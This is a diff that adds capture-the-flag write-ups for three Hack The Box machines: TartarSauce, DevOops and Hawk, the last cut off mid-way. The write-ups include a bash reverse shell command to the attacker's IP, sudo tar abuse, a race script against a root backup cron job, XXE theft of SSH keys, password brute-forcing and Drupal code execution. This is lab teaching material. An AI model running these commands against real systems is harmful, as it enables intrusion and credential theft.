+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/27.md b/Medium/27.md
new file mode 100644
index 0000000..505e88b
--- /dev/null
+++ b/Medium/27.md
@@ -0,0 +1,339 @@
+# TartarSauce Writeup
+
+
+
+## Introduction :
+
+TartarSauce is a Medium linux box released back in May 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.88
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 12:17 GMT
+ Nmap scan report for 10.10.10.88
+ Host is up (0.071s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p80 10.10.10.88
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 12:17 GMT
+ Nmap scan report for 10.10.10.88
+ Host is up (0.073s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ | http-robots.txt: 5 disallowed entries
+ | /webservices/tar/tar/source/
+ | /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
+ |_/webservices/developmental/ /webservices/phpmyadmin/
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Landing Page
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.09 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running httpd 2.4.18 with an interesting directory which is /webservices/ so let's dirsearch it:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.88/webservices/ -t 50 -e txt,html,php,xml -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 7124
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-18_12-39-18.log
+
+ Target: http://10.10.10.88/webservices/
+
+ [12:39:18] Starting:
+ [12:39:52] 301 - 319B - /webservices/wp -> http://10.10.10.88/webservices/wp/
+
+ Task Completed
+
+
+
+And we found the directory /webservices/wp ! so let's use wpscan to enumerate the wordpress website :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wpscan -ep --url http://10.10.10.88/webservices/wp
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.9
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
+ [+] Started: Wed Mar 18 12:41:15 2020
+
+ Interesting Finding(s):
+
+
+
+Running the aforementionned command, we are hinted towards a vulnerable plugin : Gwolle Guestbook <= 2.5.3 which, according to our WPScan is vulnerable to Cross Site Scripting. http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
+
+You can check out Gwolle Guestbook's WP plugin RFI vulnerability explanation [here](https://www.immuniweb.com/advisory/HTB23275). Basically, the vulnerability is located in gwolle's frontent captcha ajaxresponse.php, and more precisely in the abspath parameter, which basically is where the RFI vulnerability is. so we can trigger a reverse shell to our local port 9001 with a simple curl command.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → locate nihilist.php
+ /home/nihilist/_HTB/Apocalyst/nihilist.php
+ /home/nihilist/_HTB/Bastard/nihilist.php
+ /home/nihilist/_HTB/Cronos/nihilist.php
+ /home/nihilist/_HTB/Enterprise/nihilist.php
+ /home/nihilist/_HTB/Haircut/nihilist.php
+ /home/nihilist/_HTB/Meow/nihilist.php
+ /home/nihilist/_HTB/Networked/nihilist.php.gif
+ /home/nihilist/_HTB/October/nihilist.php5
+ /home/nihilist/_HTB/Popcorn/nihilist.php
+ /home/nihilist/_HTB/Popcorn/nihilist.php.gif
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → cp /home/nihilist/_HTB/Meow/nihilist.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → nano nihilist.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → sudo python -m SimpleHTTPServer 80
+ [sudo] password for nihilist:
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+` 
+
+And we get a reverse shell ! although we need to elevate our privileges to the onuma user, so let's poke around the box a bit, Our first reflex here is sudo -l as always:
+
+
+ www-data@TartarSauce:/$ sudo -l
+ sudo -l
+ Matching Defaults entries for www-data on TartarSauce:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User www-data may run the following commands on TartarSauce:
+ (onuma) NOPASSWD: /bin/tar
+
+
+And it looks like we are able to execute /bin/tar as onuma without any password! so we need to get a shell by using /bin/tar, One way of doing so is creating a textfile containing the following:
+
+
+ #!/bin/bash
+ bash -i >& /dev/tcp/10.10.14.11/9002 0>&1
+
+
+Saving it as a bashscript, and then getting tar to execute it with the -cvf flags.
+
+
+ www-data@TartarSauce:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.11/9002 0>&1' > nihilist.sh
+
+ www-data@TartarSauce:/tmp$ tar -cvf nihilist.tar nihilist.sh
+ tar -cvf nihilist.tar nihilist.sh
+ nihilist.sh
+
+ www-data@TartarSauce:/tmp$ ls
+ ls
+ nihilist.sh
+ nihilist.tar
+ systemd-private-ae3f290ecd13426bbc3a0ef6fa0c5f2f-systemd-timesyncd.service-6eF29j
+ vmware-root
+
+
+Now that we have our nihilist.tar we use tar's --to-command flag which will execute our bashscript, and obviously we'll run tar as the user onuma:
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+
+
+
+` _Terminal 2:_
+
+
+ www-data@TartarSauce:/tmp$ sudo -u onuma tar -xvf nihilist.tar --to-command /bin/bash
+
+
+` _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+ Ncat: Connection from 10.10.10.88.
+ Ncat: Connection from 10.10.10.88:43532.
+ bash: cannot set terminal process group (1247): Inappropriate ioctl for device
+ bash: no job control in this shell
+ onuma@TartarSauce:/tmp$ whoami
+ whoami
+ onuma
+ onuma@TartarSauce:/tmp$ cat /home/onuma/user.txt
+ cat /home/onuma/user.txt
+ b2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now we can use pspy to find about the cronjob script ran as root every 5 minutes /usr/sbin/backuperer
+
+
+ onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer
+ cat /usr/sbin/backuperer
+ #!/bin/bash
+
+ #-------------------------------------------------------------------------------------
+ # backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
+ # ONUMA Dev auto backup program
+ # This tool will keep our webapp backed up incase another skiddie defaces us again.
+ # We will be able to quickly restore from a backup in seconds ;P
+ #-------------------------------------------------------------------------------------
+
+ # Set Vars Here
+ basedir=/var/www/html
+ bkpdir=/var/backups
+ tmpdir=/var/tmp
+ testmsg=$bkpdir/onuma_backup_test.txt
+ errormsg=$bkpdir/onuma_backup_error.txt
+ tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
+ check=$tmpdir/check
+
+ # formatting
+ printbdr()
+ {
+ for n in $(seq 72);
+ do /usr/bin/printf $"-";
+ done
+ }
+ bdr=$(printbdr)
+
+ # Added a test file to let us see when the last backup was run
+ /usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
+
+ # Cleanup from last time.
+ /bin/rm -rf $tmpdir/.* $check
+
+ # Backup onuma website dev files.
+ /usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
+
+ # Added delay to wait for backup to complete if large files get added.
+ /bin/sleep 30
+
+ # Test the backup integrity
+ integrity_chk()
+ {
+ /usr/bin/diff -r $basedir $check$basedir
+ }
+
+ /bin/mkdir $check
+ /bin/tar -zxvf $tmpfile -C $check
+ if [[ $(integrity_chk) ]]
+ then
+ # Report errors so the dev can investigate the issue.
+ /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
+ integrity_chk >> $errormsg
+ exit 2
+ else
+ # Clean up and save archive to the bkpdir.
+ /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
+ /bin/rm -rf $check .*
+ exit 0
+ fi
+
+
+To exploit this script we can unpack the archive during the sleep period, replacing one of the files with a link to /root/root.txt and re-archive it. When the script will run to check for differences, the result of the contents of both files will end up in the logs. So we'll use [0xdf](https://0xdf.gitlab.io/)'s awesome bashscript which does it for us automatically :
+
+
+ #!/bin/bash
+
+ # work out of shm
+ cd /dev/shm
+
+ # set both start and cur equal to any backup file if it's there
+ start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
+ cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
+
+ # loop until there's a change in cur
+ echo "Waiting for archive filename to change..."
+ while [ "$start" == "$cur" -o "$cur" == "" ] ; do
+ sleep 10;
+ cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
+ done
+
+ # Grab a copy of the archive
+ echo "File changed... copying here"
+ cp $cur .
+
+ # get filename
+ fn=$(echo $cur | cut -d'/' -f4)
+
+ # extract archive
+ tar -zxf $fn
+
+ # remove robots.txt and replace it with link to root.txt
+ rm var/www/html/robots.txt
+ ln -s /root/root.txt var/www/html/robots.txt
+
+ # remove old archive
+ rm $fn
+
+ # create new archive
+ tar czf $fn var
+
+ # put it back, and clean up
+ mv $fn $cur
+ rm $fn
+ rm -rf var
+
+ # wait for results
+ echo "Waiting for new logs..."
+ tail -f /var/backups/onuma_backup_error.txt
+
+
+That we can also transform into a one liner:
+
+
+ cd /dev/shm; start=$(find /var/tmp -maxdepth 1 -type f -name ".*"); cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); while [ "$start" == "$cur" -o "$cur" == "" ] ; do sleep 10; cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); done; echo "File changed... copying here"; cp $cur .; fn=$(echo $cur | cut -d'/' -f4); tar -zxf $fn; rm var/www/html/robots.txt; ln -s /root/root.txt var/www/html/robots.txt; rm $fn; tar czf $fn var; mv $fn $cur; rm $fn; rm -rf var
+
+
+We'll save the script locally, then use both python's SimpleHTTPServer with curl that is on the machine to execute the script without having to download it onto the box:
+
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/28.md b/Medium/28.md
new file mode 100644
index 0000000..e667503
--- /dev/null
+++ b/Medium/28.md
@@ -0,0 +1,182 @@
+# DevOops Writeup
+
+
+
+## Introduction :
+
+DevOops is a Medium linux box released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.91 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 09:57 GMT
+ Nmap scan report for 10.10.10.91
+ Host is up (0.050s latency).
+ Not shown: 8318 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 5000/tcp open upnp
+
+ Nmap done: 1 IP address (1 host up) scanned in 5.09 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p22,5000 10.10.10.91
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 09:57 GMT
+ Nmap scan report for 10.10.10.91
+ Host is up (0.039s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
+ | 256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
+ |_ 256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
+ 5000/tcp open http Gunicorn 19.7.1
+ |_http-server-header: gunicorn/19.7.1
+ |_http-title: Site doesn't have a title (text/html; charset=utf-8).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 5000 running http Gunicorn 19 so let's investigate it with dirsearch:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.91:5000/ -e txt,php,html,xml -x 403 -t 100
+
+
+` 
+
+Looks like we have a website in construction so let's check out /upload which is a webpage onto which we can upload xml files So just like for [Aragorg](19.html), we will try to do some XXE exploitation, by first trying to print out the /etc/passwd file:
+
+
+
+What we just did was creating an infected xml file, uploaded it, and intercepted the request with burpsuite, so that we can send it to the repeater (CTRL+R) and then modify it and send it repeatedly:
+
+
+
+And we get code execution ! we have been able to find the user "roosa" so let's try to print out her flag :
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we know we can print out roosa's files, let's print out her private ssh key (/home/roosa/.ssh/id_rsa):
+
+
+
+Then we basically save it locally, change it's permissions correctly, and log into the box as the user roosa via the ssh port that our nmap scan picked up earlier.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/DevOops]
+ → nano pkey
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/DevOops]
+ → chmod 600 pkey
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/DevOops]
+ → ssh -i pkey roosa@10.10.10.91
+ The authenticity of host '10.10.10.91 (10.10.10.91)' can't be established.
+ ECDSA key fingerprint is SHA256:hbD2D4PdnIVpAFHV8sSAbtM0IlTAIpYZ/nwspIdp4Vg.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.91' (ECDSA) to the list of known hosts.
+ Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 135 packages can be updated.
+ 60 updates are security updates.
+
+
+ The programs included with the Ubuntu system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
+ applicable law.
+
+ roosa@gitter:~$ uname -a
+ Linux gitter 4.13.0-37-generic #42~16.04.1-Ubuntu SMP Wed Mar 7 16:02:25 UTC 2018 i686 athlon i686 GNU/Linux
+
+
+From there we navigate around and we stumble upon an interesting directory /home/roosa/work/blogfeed which contains a .git folder for us to enumerate:
+
+
+ roosa@gitter:~$ ls
+ deploy Downloads Pictures service.sh user.txt
+ Desktop examples.desktop Public service.sh~ Videos
+ Documents Music run-blogfeed.sh Templates work
+ roosa@gitter:~$ cd work
+ roosa@gitter:~/work$ ls
+ blogfeed
+ roosa@gitter:~/work$ cd blogfeed
+ roosa@gitter:~/work/blogfeed$ ls
+ README.md resources run-gunicorn.sh src
+ roosa@gitter:~/work/blogfeed$ ls -lash
+ total 28K
+ 4.0K drwxrwx--- 5 roosa roosa 4.0K Mar 21 2018 .
+ 4.0K drwxrwxr-x 3 roosa roosa 4.0K Mar 21 2018 ..
+ 4.0K drwxrwx--- 8 roosa roosa 4.0K Mar 26 2018 .git
+ 4.0K -rw-rw---- 1 roosa roosa 104 Mar 19 2018 README.md
+ 4.0K drwxrwx--- 3 roosa roosa 4.0K Mar 19 2018 resources
+ 4.0K -rwxrw-r-- 1 roosa roosa 180 Mar 21 2018 run-gunicorn.sh
+ 4.0K drwxrwx--- 2 roosa roosa 4.0K Mar 26 2018 src
+
+
+Now let's get into the .git directory and see if we can print out the previous git commits just like on the [Canape box](25.html) but this time we specify the -p flag in order to list the changes under each commit:
+
+
+ roosa@gitter:~/work/blogfeed$ git log -p
+
+
+And right under commit **d387abf63e05c9628a59195cec9311751bdb283f** we see another private key for us to use :
+
+
+
+So we save the key locally , give it the proper permissions and use it to login as root via ssh onto the box :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/DevOops]
+ → nano pkey_root
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/DevOops]
+ → chmod 600 pkey_root
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/DevOops]
+ → ssh -i pkey_root root@10.10.10.91
+ Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 135 packages can be updated.
+ 60 updates are security updates.
+
+ Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1
+ root@gitter:~# whoami
+ root
+ root@gitter:~# cat /root/root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag on the box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/29.md b/Medium/29.md
new file mode 100644
index 0000000..765472b
--- /dev/null
+++ b/Medium/29.md
@@ -0,0 +1,424 @@
+# Hawk Writeup
+
+
+
+## Introduction :
+
+Hawk is a Medium linux box released back in July 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -F 10.10.10.102
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 21:56 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.076s latency).
+ Not shown: 97 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -sCV -p21,22,80 10.10.10.102
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 21:56 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.082s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_drwxr-xr-x 2 ftp ftp 4096 Jun 16 2018 messages
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to ::ffff:10.10.14.24
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | At session startup, client count was 4
+ | vsFTPd 3.0.3 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
+ | 256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
+ |_ 256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-generator: Drupal 7 (http://drupal.org)
+ | http-robots.txt: 36 disallowed entries (15 shown)
+ | /includes/ /misc/ /modules/ /profiles/ /scripts/
+ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
+ | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
+ |_/LICENSE.txt /MAINTAINERS.txt
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Welcome to 192.168.56.103 | 192.168.56.103
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.51 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http with drupal 7 just like the box [Bastard](2.html) except that this time we are dealing with a linux box. Although our nmap scan also picked up port 21 ftp with anonymous login, so let's check it out first:
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → ftp 10.10.10.102
+ Connected to 10.10.10.102.
+ 220 (vsFTPd 3.0.3)
+ Name (10.10.10.102:nihilist): anonymous
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ drwxr-xr-x 2 ftp ftp 4096 Jun 16 2018 messages
+ 226 Directory send OK.
+ ftp> cd messages
+ 250 Directory successfully changed.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ 226 Directory send OK.
+ ftp> ls -lash
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ drwxr-xr-x 2 ftp ftp 4096 Jun 16 2018 .
+ drwxr-xr-x 3 ftp ftp 4096 Jun 16 2018 ..
+ -rw-r--r-- 1 ftp ftp 240 Jun 16 2018 .drupal.txt.enc
+ 226 Directory send OK.
+ ftp> get .drupal.txt.enc
+ local: .drupal.txt.enc remote: .drupal.txt.enc
+ 200 PORT command successful. Consider using PASV.
+ 150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes).
+ 226 Transfer complete.
+ 240 bytes received in 0.00 secs (165.9880 kB/s)
+ ftp> exit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → cd _HTB/Hawk && mv ../../.drupal.txt.enc .
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → file .drupal.txt.enc
+ .drupal.txt.enc: openssl enc'd data with salted password, base64 encoded
+
+
+So we have a base64 encoded openssl encrypted string of data with salted password so let's first de-base64 it :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → cat .drupal.txt.enc| base64 -d > drupal.txt.enc
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → file drupal.txt.enc
+ drupal.txt.enc: openssl enc'd data with salted password
+
+
+Now from there we can bruteforce this openssl salted file with a tool called "bruteforce-salted-openssl"
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → bruteforce-salted-openssl -t 50 -f /usr/share/wordlists/rockyou.txt -d sha256 drupal.txt.enc -1
+ Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.
+
+ Tried passwords: 0
+ Tried passwords per second: -nan
+ Last tried password: purple
+
+ Password candidate: friends
+
+
+The result was instant , the password is friends, now using this we can decode the file, note that bruteforce-salted-openssl uses aec-256-cbc by default so we also know that it is the algorithm used to encrypt the file, so let's use it to decrypt it using the friends password :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → openssl aes-256-cbc -d -in drupal.txt.enc -out drupal.txt
+ enter aes-256-cbc decryption password:
+ *** WARNING : deprecated key derivation used.
+ Using -iter or -pbkdf2 would be better.
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → ls
+ drupal.txt drupal.txt.enc
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → cat drupal.txt
+ Daniel,
+
+ Following the password for the portal:
+
+ PencilKeyboardScanner123
+
+ Please let us know when the portal is ready.
+
+ Kind Regards,
+
+ IT department
+
+
+And we have another password to use ! PencilKeyboardScanner123, now let's investigate the http port our nmap scan picked up earlier :
+
+
+
+And we are logged in as admin ! now let's enable php:
+
+ 
+
+And once we saved the configuration at the bottom, we head into Content > Add Content > Basic Page:
+
+
+
+Scroll down, clicking preview with a netcat listener on our port 9001:
+
+
+
+And we get a low privilege shell as www-data ! now let's see what we can do from there:
+
+
+ www-data@hawk:/var/www/html$ uname -a
+ uname -a
+ Linux hawk 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ www-data@hawk:/var/www/html$ ls -la
+ ls -la
+ total 296
+ drwxr-xr-x 9 root root 4096 Jun 11 2018 .
+ drwxr-xr-x 3 root root 4096 Jun 11 2018 ..
+ -rw-r--r-- 1 www-data www-data 6104 Jun 11 2018 .htaccess
+ -rwxr-x--- 1 www-data www-data 111859 Jun 11 2018 CHANGELOG.txt
+ -rwxr-x--- 1 www-data www-data 1481 Jun 11 2018 COPYRIGHT.txt
+ -rwxr-x--- 1 www-data www-data 1717 Jun 11 2018 INSTALL.mysql.txt
+ -rwxr-x--- 1 www-data www-data 1874 Jun 11 2018 INSTALL.pgsql.txt
+ -rwxr-x--- 1 www-data www-data 1298 Jun 11 2018 INSTALL.sqlite.txt
+ -rwxr-x--- 1 www-data www-data 17995 Jun 11 2018 INSTALL.txt
+ -rwxr-x--- 1 www-data www-data 18092 Jun 11 2018 LICENSE.txt
+ -rwxr-x--- 1 www-data www-data 8710 Jun 11 2018 MAINTAINERS.txt
+ -rwxr-x--- 1 www-data www-data 5382 Jun 11 2018 README.txt
+ -rwxr-x--- 1 www-data www-data 10123 Jun 11 2018 UPGRADE.txt
+ -rwxr-x--- 1 www-data www-data 6604 Jun 11 2018 authorize.php
+ -rwxr-x--- 1 www-data www-data 720 Jun 11 2018 cron.php
+ drwxr-x--- 4 www-data www-data 4096 Jun 11 2018 includes
+ -rwxr-x--- 1 www-data www-data 529 Jun 11 2018 index.php
+ -rwxr-x--- 1 www-data www-data 703 Jun 11 2018 install.php
+ drwxr-x--- 4 www-data www-data 4096 Jun 11 2018 misc
+ drwxr-x--- 42 www-data www-data 4096 Jun 11 2018 modules
+ drwxr-x--- 5 www-data www-data 4096 Jun 11 2018 profiles
+ -rwxr-x--- 1 www-data www-data 2189 Jun 11 2018 robots.txt
+ drwxr-x--- 2 www-data www-data 4096 Jun 11 2018 scripts
+ drwxr-x--- 4 www-data www-data 4096 Jun 11 2018 sites
+ drwxr-x--- 7 www-data www-data 4096 Jun 11 2018 themes
+ -rwxr-x--- 1 www-data www-data 19986 Jun 11 2018 update.php
+ -rwxr-x--- 1 www-data www-data 2200 Jun 11 2018 web.config
+ -rwxr-x--- 1 www-data www-data 417 Jun 11 2018 xmlrpc.php
+
+ www-data@hawk:/var/www/html/sites/default$ ls -lash /home
+ ls -lash /home
+ total 12K
+ 4.0K drwxr-xr-x 3 root root 4.0K Jun 16 2018 .
+ 4.0K drwxr-xr-x 23 root root 4.0K Jun 12 2018 ..
+ 4.0K drwxr-xr-x 5 daniel daniel 4.0K Jul 1 2018 daniel
+
+
+Here we see that the only user on this box is daniel. which we can also verify by printing out /etc/passwd to which we see that he can use python3, which will be handy to upgrade our shell to a TTY shell:
+
+
+ www-data@hawk:/var/www/html/sites/default$ cat /etc/passwd | grep daniel
+ cat /etc/passwd | grep daniel
+ daniel:x:1002:1005::/home/daniel:/usr/bin/python3
+
+
+Poking around with out low privilege shell we stumble upon /var/www/html/sites/default/settings.php which contains cleartext passwords :
+
+
+ www-data@hawk:/var/www/html$ cd sites
+ cd sites
+ www-data@hawk:/var/www/html/sites$ ls
+ ls
+ README.txt
+ all
+ default
+ example.sites.php
+ www-data@hawk:/var/www/html/sites$ cd default
+ cd default
+ www-data@hawk:/var/www/html/sites/default$ ls -lash
+ ls -lash
+ total 68K
+ 4.0K dr-xr-x--- 3 www-data www-data 4.0K Jun 11 2018 .
+ 4.0K drwxr-x--- 4 www-data www-data 4.0K Jun 11 2018 ..
+ 28K -rwxr-x--- 1 www-data www-data 26K Jun 11 2018 default.settings.php
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jun 11 2018 files
+ 28K -r--r--r-- 1 www-data www-data 26K Jun 11 2018 settings.php
+ www-data@hawk:/var/www/html/sites/default$ cat settings.php | grep pasword
+ cat settings.php | grep pasword
+ www-data@hawk:/var/www/html/sites/default$ egrep password settings.php
+ egrep password settings.php
+ * 'password' => 'password',
+ * username, password, host, and database name.
+ * 'password' => 'password',
+ * 'password' => 'password',
+ * 'password' => 'password',
+ * 'password' => 'password',
+ 'password' => 'drupal4hawk',
+ * by using the username and password variables. The proxy_user_agent variable
+ # $conf['proxy_password'] = '';
